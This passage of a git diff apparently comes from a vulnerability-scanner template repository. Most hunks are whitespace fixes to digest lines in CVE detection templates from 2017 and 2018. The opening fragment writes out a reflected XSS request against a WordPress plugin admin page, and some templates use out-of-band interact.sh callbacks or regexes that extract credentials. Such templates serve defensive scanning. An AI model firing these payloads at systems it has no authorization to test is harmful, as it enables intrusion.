Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/user-role/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "User Role by BestWebSoft")' condition: and -# digest: 490a0046304402205cd9fcf5d977b8f69ba65cc05ec211663e502f065b948e6153f9be9b2cebe4660220348cb572d069e0767d29ed3d3b72d2648f4865d2a91f4c5eaec667f75cf2687c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402205cd9fcf5d977b8f69ba65cc05ec211663e502f065b948e6153f9be9b2cebe4660220348cb572d069e0767d29ed3d3b72d2648f4865d2a91f4c5eaec667f75cf2687c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index 8799a14d4a..1ab7099844 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -43,4 +43,5 @@ http: part: body words: - "console.log" -# digest: 490a0046304402203a3f370e391ecd72406cf5ee19c5620a99673d4b69c460a2957a3270c0cd51c402207be3b8b4e71835e4b0c8f0c6ec972dd31c565e929d5a2ce2f143adf0bef5f041:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402203a3f370e391ecd72406cf5ee19c5620a99673d4b69c460a2957a3270c0cd51c402207be3b8b4e71835e4b0c8f0c6ec972dd31c565e929d5a2ce2f143adf0bef5f041:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18638.yaml b/http/cves/2017/CVE-2017-18638.yaml index dff80eb1d3..64d977d327 100644 --- a/http/cves/2017/CVE-2017-18638.yaml +++ b/http/cves/2017/CVE-2017-18638.yaml @@ -38,4 +38,5 @@ http: part: interactsh_protocol words: - "http" -# digest: 4b0a00483046022100b40144dd3719f2816c654a35efb9a03361612d070b8308403e55ee2a4da36066022100cf83ca43573067138ed9fbbd076ec054e7a16ec9286d62293cb35bed91063d12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100b40144dd3719f2816c654a35efb9a03361612d070b8308403e55ee2a4da36066022100cf83ca43573067138ed9fbbd076ec054e7a16ec9286d62293cb35bed91063d12:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml index 61b15b4cc4..b5d4779a47 100644 --- a/http/cves/2017/CVE-2017-3506.yaml +++ b/http/cves/2017/CVE-2017-3506.yaml @@ -55,4 +55,5 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a00473045022041e0898c60e4fdcc4067fa0efc41f96bfc3f58df0bae5de172bd46c6b7161bfc022100d261a0f516e48e8ed91bd55cb19d25a0ea643e9bb20ecad64fa1819364d29476:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022041e0898c60e4fdcc4067fa0efc41f96bfc3f58df0bae5de172bd46c6b7161bfc022100d261a0f516e48e8ed91bd55cb19d25a0ea643e9bb20ecad64fa1819364d29476:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-3528.yaml b/http/cves/2017/CVE-2017-3528.yaml index e6355c069b..9a6206f412 100644 --- a/http/cves/2017/CVE-2017-3528.yaml +++ b/http/cves/2017/CVE-2017-3528.yaml @@ -37,4 +37,5 @@ http: part: body words: - 'noresize src="/\interact.sh?configName=' -# digest: 490a0046304402203a4c421403c8b01c48b4876928870be74460f5ff09b066a4a3f46d0e18bd218902205d3ea283aaccc89e2d9f69325286d1cb8c47fc4f79fc14561dc0e715149cdd9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402203a4c421403c8b01c48b4876928870be74460f5ff09b066a4a3f46d0e18bd218902205d3ea283aaccc89e2d9f69325286d1cb8c47fc4f79fc14561dc0e715149cdd9e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-4011.yaml b/http/cves/2017/CVE-2017-4011.yaml index 962cd47eab..2e15eee6b5 100644 --- a/http/cves/2017/CVE-2017-4011.yaml +++ b/http/cves/2017/CVE-2017-4011.yaml @@ -45,4 +45,5 @@ http: part: header words: - "text/html" -# digest: 4b0a00483046022100e0f22a1f3d9b9282b767e26989deba3a343023057f2609acb05a8f9071a1921f0221009e020b61f70f9333f0ec73763cd2ff038993ed36c356f0c6fe7bf8a11223a610:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100e0f22a1f3d9b9282b767e26989deba3a343023057f2609acb05a8f9071a1921f0221009e020b61f70f9333f0ec73763cd2ff038993ed36c356f0c6fe7bf8a11223a610:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-5631.yaml b/http/cves/2017/CVE-2017-5631.yaml index 6e7b9ee4b5..30e4775146 100644 --- a/http/cves/2017/CVE-2017-5631.yaml +++ b/http/cves/2017/CVE-2017-5631.yaml @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202d3b6fabfc85633b3a6032bc0086b6574f336dfcfa0ca910574123508dc1801d022100f1742fddb5b92b2a0e07cd2bd4fa229a91586f88b6ab512a3128e6f21626e9a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502202d3b6fabfc85633b3a6032bc0086b6574f336dfcfa0ca910574123508dc1801d022100f1742fddb5b92b2a0e07cd2bd4fa229a91586f88b6ab512a3128e6f21626e9a2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-5689.yaml b/http/cves/2017/CVE-2017-5689.yaml index 2fb82809c9..852af47144 100644 --- a/http/cves/2017/CVE-2017-5689.yaml +++ b/http/cves/2017/CVE-2017-5689.yaml @@ -53,4 +53,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220037ac974a499d1da876474653321af56396c4009d7f4c0a69349b0331c0515fd022000f628246878e72e097ee981460a8fe84b9a78bc4df82c17cf17047349e23019:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220037ac974a499d1da876474653321af56396c4009d7f4c0a69349b0331c0515fd022000f628246878e72e097ee981460a8fe84b9a78bc4df82c17cf17047349e23019:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-5982.yaml b/http/cves/2017/CVE-2017-5982.yaml index 46271f9531..b904e97556 100644 --- a/http/cves/2017/CVE-2017-5982.yaml +++ b/http/cves/2017/CVE-2017-5982.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220078c2e229f20996e91d6fd30559c4fac0e1bef12e319ebd0d0d9ee4a5051857b022100bb97d81f69c4206d7832463ae3bf7f1dd48931f89975c413b4aa6fbf300e8077:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220078c2e229f20996e91d6fd30559c4fac0e1bef12e319ebd0d0d9ee4a5051857b022100bb97d81f69c4206d7832463ae3bf7f1dd48931f89975c413b4aa6fbf300e8077:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-7391.yaml b/http/cves/2017/CVE-2017-7391.yaml index 8d847686dd..69ba6e4086 100644 --- a/http/cves/2017/CVE-2017-7391.yaml +++ b/http/cves/2017/CVE-2017-7391.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207050f1e7e966fa84b42895fa43dbc2a902266833625ac877b044a4c3e259f471022100aee74b3615590bca33fbbee64e6c1f660d8a1f92e042c92e1707d5a25e721813:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502207050f1e7e966fa84b42895fa43dbc2a902266833625ac877b044a4c3e259f471022100aee74b3615590bca33fbbee64e6c1f660d8a1f92e042c92e1707d5a25e721813:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-7921.yaml b/http/cves/2017/CVE-2017-7921.yaml index 97dff3a68d..77ef1ec249 100644 --- a/http/cves/2017/CVE-2017-7921.yaml +++ b/http/cves/2017/CVE-2017-7921.yaml @@ -42,4 +42,5 @@ http: part: header words: - "application/xml" -# digest: 4a0a00473045022100bcf07a3f6e772257dd47f05f6edbaadcce593f2e317e962743f47b5f4249bb4402203b41ec7e55da949dfdb0bb84444181855368e8349b07bab0009a6d6d998c06c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100bcf07a3f6e772257dd47f05f6edbaadcce593f2e317e962743f47b5f4249bb4402203b41ec7e55da949dfdb0bb84444181855368e8349b07bab0009a6d6d998c06c2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-7925.yaml b/http/cves/2017/CVE-2017-7925.yaml index 08fa9ee68b..52d38885d9 100644 --- a/http/cves/2017/CVE-2017-7925.yaml +++ b/http/cves/2017/CVE-2017-7925.yaml @@ -45,4 +45,5 @@ http: group: 1 regex: - 1:(.*:.*):1:CtrPanel -# digest: 490a0046304402205cadfc5cef96e65b14f87e24e92b087b8e625fb7ba54882e16e86aac73c8f38d02206f1e1e28068806b87fcd5e41dcb447cc63ad9d902024e5e7288cd64936445b9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402205cadfc5cef96e65b14f87e24e92b087b8e625fb7ba54882e16e86aac73c8f38d02206f1e1e28068806b87fcd5e41dcb447cc63ad9d902024e5e7288cd64936445b9e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-9288.yaml b/http/cves/2017/CVE-2017-9288.yaml index 5f6edf4c6a..be464e1ca7 100644 --- a/http/cves/2017/CVE-2017-9288.yaml +++ b/http/cves/2017/CVE-2017-9288.yaml @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402202f91b1fe950d7522faeaa6a9270f5915bb674f3c617ca60442367dd812c95735022015f634dd5c081a5b11069c873ea25ce00a037df3ccab33a12a16fd622491d1c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402202f91b1fe950d7522faeaa6a9270f5915bb674f3c617ca60442367dd812c95735022015f634dd5c081a5b11069c873ea25ce00a037df3ccab33a12a16fd622491d1c3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml index 3733b8d216..9f8e625c19 100644 --- a/http/cves/2017/CVE-2017-9416.yaml +++ b/http/cves/2017/CVE-2017-9416.yaml @@ -49,4 +49,5 @@ http: - "contains(body, 'extensions')" - "status_code == 200" condition: and -# digest: 4b0a0048304602210083ca4249bc0e02253013e7f5ee6ab2b6ab101535df1c96582b5d702b5a2fcaa7022100f46925c8e55d4592536ae12f25ed2da36200b9208fb82af269c2d53cc6bab8c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a0048304602210083ca4249bc0e02253013e7f5ee6ab2b6ab101535df1c96582b5d702b5a2fcaa7022100f46925c8e55d4592536ae12f25ed2da36200b9208fb82af269c2d53cc6bab8c8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-9506.yaml b/http/cves/2017/CVE-2017-9506.yaml index 2e045b96c1..78194c0cc5 100644 --- a/http/cves/2017/CVE-2017-9506.yaml +++ b/http/cves/2017/CVE-2017-9506.yaml @@ -39,4 +39,5 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a0047304502202a335ccefd32940d2d3e5ef13a0e7eaaaf766ae5e42c297c19f889fbf0203cd5022100c18573560f4256272e9d6add635ae76d2b2d15928f0ae36c61e60ec2b1f00123:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502202a335ccefd32940d2d3e5ef13a0e7eaaaf766ae5e42c297c19f889fbf0203cd5022100c18573560f4256272e9d6add635ae76d2b2d15928f0ae36c61e60ec2b1f00123:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-9791.yaml b/http/cves/2017/CVE-2017-9791.yaml index aaf86f88c4..4474b52e90 100644 --- a/http/cves/2017/CVE-2017-9791.yaml +++ b/http/cves/2017/CVE-2017-9791.yaml @@ -59,4 +59,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022065379bfe561e509a7f29bb9ebacd95d1e082c5ac0ff5114593748a19add24ce8022039ec13a2f1d6eccf357c11c8e00eedbfbf34b62687753a02219ac04114473853:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022065379bfe561e509a7f29bb9ebacd95d1e082c5ac0ff5114593748a19add24ce8022039ec13a2f1d6eccf357c11c8e00eedbfbf34b62687753a02219ac04114473853:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-9822.yaml b/http/cves/2017/CVE-2017-9822.yaml index 0b996e84c6..7f7a1360f5 100644 --- a/http/cves/2017/CVE-2017-9822.yaml +++ b/http/cves/2017/CVE-2017-9822.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 404 -# digest: 4a0a0047304502210083b05138e9895c362557a023e59cfef0ed8b4050535cb4c2f2bcf7d68ab872c202204da5c53243218a15dc679e173473963239c71bc52945e3753a2649c7492aef90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502210083b05138e9895c362557a023e59cfef0ed8b4050535cb4c2f2bcf7d68ab872c202204da5c53243218a15dc679e173473963239c71bc52945e3753a2649c7492aef90:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-9833.yaml b/http/cves/2017/CVE-2017-9833.yaml index e41c0c601d..a43c12e2c7 100644 --- a/http/cves/2017/CVE-2017-9833.yaml +++ b/http/cves/2017/CVE-2017-9833.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220207cbb25013a0e5a7e795fd668f86aab9063f73cef338fbca5c6510cad347bec0220418267efd798dbcfe046d7e0ae2fe628be043bb7a845597dfacfa41e01c5821d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220207cbb25013a0e5a7e795fd668f86aab9063f73cef338fbca5c6510cad347bec0220418267efd798dbcfe046d7e0ae2fe628be043bb7a845597dfacfa41e01c5821d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-0127.yaml b/http/cves/2018/CVE-2018-0127.yaml index fd7d9ff83e..1850b82750 100644 --- a/http/cves/2018/CVE-2018-0127.yaml +++ b/http/cves/2018/CVE-2018-0127.yaml @@ -16,7 +16,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-0127 - cwe-id: CWE-306,CWE-200 + cwe-id: CWE-200,CWE-306 epss-score: 0.09982 epss-percentile: 0.94218 cpe: cpe:2.3:o:cisco:rv132w_firmware:1.0.0.1:*:*:*:*:*:*:* @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100abde0279c177c67092f61e26056419bdf28a069e66f294d98a4b9d7973c158db0220753417a23d53fee6ea5aa776c86c5e10c2071b00c95d8a795f5f83adcd9108ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100abde0279c177c67092f61e26056419bdf28a069e66f294d98a4b9d7973c158db0220753417a23d53fee6ea5aa776c86c5e10c2071b00c95d8a795f5f83adcd9108ae:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1000129.yaml b/http/cves/2018/CVE-2018-1000129.yaml index f79ed6f77a..9c8e51f49b 100644 --- a/http/cves/2018/CVE-2018-1000129.yaml +++ b/http/cves/2018/CVE-2018-1000129.yaml @@ -54,4 +54,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fb994a13431e13d3eac6c143271386b4fa80d3eb55d20c259f0bf9d103a76dba02206ee016f547894388dc61dd7a66687ae932ceee0f9f2f630096c6d06c7423abbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100fb994a13431e13d3eac6c143271386b4fa80d3eb55d20c259f0bf9d103a76dba02206ee016f547894388dc61dd7a66687ae932ceee0f9f2f630096c6d06c7423abbf:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1000130.yaml b/http/cves/2018/CVE-2018-1000130.yaml index cb753b3338..bf11d80f17 100644 --- a/http/cves/2018/CVE-2018-1000130.yaml +++ b/http/cves/2018/CVE-2018-1000130.yaml @@ -52,4 +52,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022051c70daf773983662e29fb2191290fae9f439b86e0c178177fdf0543547c68e702202f3e8975ca237ad417443f45475a73d9c82e03f2bdc918a092663e06d41f089c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022051c70daf773983662e29fb2191290fae9f439b86e0c178177fdf0543547c68e702202f3e8975ca237ad417443f45475a73d9c82e03f2bdc918a092663e06d41f089c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1000226.yaml b/http/cves/2018/CVE-2018-1000226.yaml index b3fe8b245d..957c01dbfe 100644 --- a/http/cves/2018/CVE-2018-1000226.yaml +++ b/http/cves/2018/CVE-2018-1000226.yaml @@ -68,4 +68,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008e0b6ded3499b0594851d8405052935217c5864819b57f8e4963e4e2b7c8a2ee02205a9114b6952f54543bb07cbf79ed6073c5cfc3ae70a67366df1bab55c9283ee1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221008e0b6ded3499b0594851d8405052935217c5864819b57f8e4963e4e2b7c8a2ee02205a9114b6952f54543bb07cbf79ed6073c5cfc3ae70a67366df1bab55c9283ee1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1000671.yaml b/http/cves/2018/CVE-2018-1000671.yaml index 199da0850c..edf480c407 100644 --- a/http/cves/2018/CVE-2018-1000671.yaml +++ b/http/cves/2018/CVE-2018-1000671.yaml @@ -39,4 +39,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022100f5ce51e64231a96fb55b24b9e94deec38d335ff1a58ff01e46a677530533440802202ed53b9f763c98bc153a8731c47760b287f9c1728396f5efcc9936f2bb76de21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100f5ce51e64231a96fb55b24b9e94deec38d335ff1a58ff01e46a677530533440802202ed53b9f763c98bc153a8731c47760b287f9c1728396f5efcc9936f2bb76de21:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml index 1e3c243aba..f3d245d57b 100644 --- a/http/cves/2018/CVE-2018-1000856.yaml +++ b/http/cves/2018/CVE-2018-1000856.yaml @@ -64,4 +64,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f26299a27a9834e6af1f1788818e69e28b28574b5cf9fc155e67801ba16d0396022100aae8b1ae6a13e789cdcba6ea259ce40a087cf040abc24733e6b2f3cea8e09634:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100f26299a27a9834e6af1f1788818e69e28b28574b5cf9fc155e67801ba16d0396022100aae8b1ae6a13e789cdcba6ea259ce40a087cf040abc24733e6b2f3cea8e09634:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-10093.yaml b/http/cves/2018/CVE-2018-10093.yaml index 99a47ef524..954f5f11e2 100644 --- a/http/cves/2018/CVE-2018-10093.yaml +++ b/http/cves/2018/CVE-2018-10093.yaml @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402207837cc8deca2c3da2047c2cbf0dfb86d7bf3e690444c6d89c927a102a58d9d5402206f278adc31198c881918016133aa0babcf59575f29763c6d1988c8ec9aa0634c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402207837cc8deca2c3da2047c2cbf0dfb86d7bf3e690444c6d89c927a102a58d9d5402206f278adc31198c881918016133aa0babcf59575f29763c6d1988c8ec9aa0634c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml index 089631042f..9b18a4a411 100644 --- a/http/cves/2018/CVE-2018-10141.yaml +++ b/http/cves/2018/CVE-2018-10141.yaml @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220454f889f9d62a71703b70b3f5bde08b59b1b482be0f0bb468c1423384ecbad4602204bf8027680fb01857c7d04c447dd3573d6e823721481915009bcd6f7721b1f3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220454f889f9d62a71703b70b3f5bde08b59b1b482be0f0bb468c1423384ecbad4602204bf8027680fb01857c7d04c447dd3573d6e823721481915009bcd6f7721b1f3f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-10201.yaml b/http/cves/2018/CVE-2018-10201.yaml index 22aae72c87..06b6707881 100644 --- a/http/cves/2018/CVE-2018-10201.yaml +++ b/http/cves/2018/CVE-2018-10201.yaml @@ -44,4 +44,5 @@ http: - "fonts" - "extensions" condition: and -# digest: 4b0a00483046022100f730c30024ed2701978ff4ef84aef98e463a8f4e60bbf696d6fcce66508c5544022100b3e2248d91b2e68b45147727628e1340786a8606d78c509dff54688c42f9c9ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100f730c30024ed2701978ff4ef84aef98e463a8f4e60bbf696d6fcce66508c5544022100b3e2248d91b2e68b45147727628e1340786a8606d78c509dff54688c42f9c9ea:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml index b8ef109113..0ffbf07dc9 100644 --- a/http/cves/2018/CVE-2018-10230.yaml +++ b/http/cves/2018/CVE-2018-10230.yaml @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c05482a9e1100fe504f848abb36658cb86efe72b2f35126cabde100aef5b7f2302203cab0ac4a56a27abad9dce14cec3ba6b957d921159575b436e0c61ecdad02bfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100c05482a9e1100fe504f848abb36658cb86efe72b2f35126cabde100aef5b7f2302203cab0ac4a56a27abad9dce14cec3ba6b957d921159575b436e0c61ecdad02bfd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-10822.yaml b/http/cves/2018/CVE-2018-10822.yaml index 2a5a0c7def..02cb88baba 100644 --- a/http/cves/2018/CVE-2018-10822.yaml +++ b/http/cves/2018/CVE-2018-10822.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100aa9228300fc1bfa261989ed45756b970a5143c3e7d745ddbada0042c46e675ae022100fdba2ee712c4b07774b88783e8d6db8ae4fb2b24eef7dd8d355256d931bb9eb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100aa9228300fc1bfa261989ed45756b970a5143c3e7d745ddbada0042c46e675ae022100fdba2ee712c4b07774b88783e8d6db8ae4fb2b24eef7dd8d355256d931bb9eb4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-10823.yaml b/http/cves/2018/CVE-2018-10823.yaml index 6bee67c8f4..491e9d320c 100644 --- a/http/cves/2018/CVE-2018-10823.yaml +++ b/http/cves/2018/CVE-2018-10823.yaml @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210091c1595a7c1763e3c8c7066e8977abd361eab72080148337063886989d61b05c022100d22be3f2c928b508363a60eeffee57dc5f21440940030c03590a6de6e0c2fa67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a0048304602210091c1595a7c1763e3c8c7066e8977abd361eab72080148337063886989d61b05c022100d22be3f2c928b508363a60eeffee57dc5f21440940030c03590a6de6e0c2fa67:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml index 3eedea81c9..ebb42e8db8 100644 --- a/http/cves/2018/CVE-2018-10956.yaml +++ b/http/cves/2018/CVE-2018-10956.yaml @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202a8104eff0133e1da6a9f09c44caeeed10f8cd858fdec7c182fcb6a17a24335d022100941de6c5f6cf6bda86bb307bddbddc6554c4f821484375326d7566c495cabef9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502202a8104eff0133e1da6a9f09c44caeeed10f8cd858fdec7c182fcb6a17a24335d022100941de6c5f6cf6bda86bb307bddbddc6554c4f821484375326d7566c495cabef9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-11227.yaml b/http/cves/2018/CVE-2018-11227.yaml index 3108ca5c79..f21dc3ffe4 100644 --- a/http/cves/2018/CVE-2018-11227.yaml +++ b/http/cves/2018/CVE-2018-11227.yaml @@ -56,4 +56,5 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009b1d24dbaddaf4a70177fb3ed94d88fd1a580060dc1add91e97c5e738ca5a751022100c56ad5cd7782af05927709effe3797fd565c6ee8d04aa9def53e3af795964d6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221009b1d24dbaddaf4a70177fb3ed94d88fd1a580060dc1add91e97c5e738ca5a751022100c56ad5cd7782af05927709effe3797fd565c6ee8d04aa9def53e3af795964d6f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-11231.yaml b/http/cves/2018/CVE-2018-11231.yaml index a902b80225..1c6e6b2a2b 100644 --- a/http/cves/2018/CVE-2018-11231.yaml +++ b/http/cves/2018/CVE-2018-11231.yaml @@ -50,4 +50,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402205c20ab5eef20ab139041277465d4332174bc3d13eed83d7b4c3929c65669390d022078f96e598ba716f8bbfb075c3c774d5a7300818abcdb0073d874baa3d38e21ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402205c20ab5eef20ab139041277465d4332174bc3d13eed83d7b4c3929c65669390d022078f96e598ba716f8bbfb075c3c774d5a7300818abcdb0073d874baa3d38e21ca:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-11409.yaml b/http/cves/2018/CVE-2018-11409.yaml index 1f76757b90..13be493f92 100644 --- a/http/cves/2018/CVE-2018-11409.yaml +++ b/http/cves/2018/CVE-2018-11409.yaml @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402204ab5cd8791b33fc4b5d67043a236be3d907ba848cc36e4f03918da86b333deb902203a9fc0455bcb14325731b7f9a79b1994ccc06ff00d162b0eec6dcae870b63bb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204ab5cd8791b33fc4b5d67043a236be3d907ba848cc36e4f03918da86b333deb902203a9fc0455bcb14325731b7f9a79b1994ccc06ff00d162b0eec6dcae870b63bb7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-11473.yaml b/http/cves/2018/CVE-2018-11473.yaml index b4aa4c15a9..31986070e5 100644 --- a/http/cves/2018/CVE-2018-11473.yaml +++ b/http/cves/2018/CVE-2018-11473.yaml @@ -69,4 +69,5 @@ http: - 'id="csrf" name="csrf" value="(.*)">' internal: true part: body -# digest: 4a0a0047304502202be4aa59eea7dba1542500ff131b5fd7d4433dc755a7b1cedc43e8276402af2d022100cf2830eeceb6d499c6e1f7cbf4d448cb10f03841286d7dd5857e76ec00a9b4c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502202be4aa59eea7dba1542500ff131b5fd7d4433dc755a7b1cedc43e8276402af2d022100cf2830eeceb6d499c6e1f7cbf4d448cb10f03841286d7dd5857e76ec00a9b4c8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-11709.yaml b/http/cves/2018/CVE-2018-11709.yaml index 2bffabcc30..9dfb83974c 100644 --- a/http/cves/2018/CVE-2018-11709.yaml +++ b/http/cves/2018/CVE-2018-11709.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203145ca9e9ee5dce091c0bead31c8a74f934a1997e2af2eaa51465f4329879c5a022100d968ebd5d8b3a4d95b0f8561932e0600cd33a6f4a40e15b99a7bcfe2069d072f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203145ca9e9ee5dce091c0bead31c8a74f934a1997e2af2eaa51465f4329879c5a022100d968ebd5d8b3a4d95b0f8561932e0600cd33a6f4a40e15b99a7bcfe2069d072f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-11759.yaml b/http/cves/2018/CVE-2018-11759.yaml index 181bffc31e..ff0274bec6 100644 --- a/http/cves/2018/CVE-2018-11759.yaml +++ b/http/cves/2018/CVE-2018-11759.yaml @@ -44,4 +44,5 @@ http: - 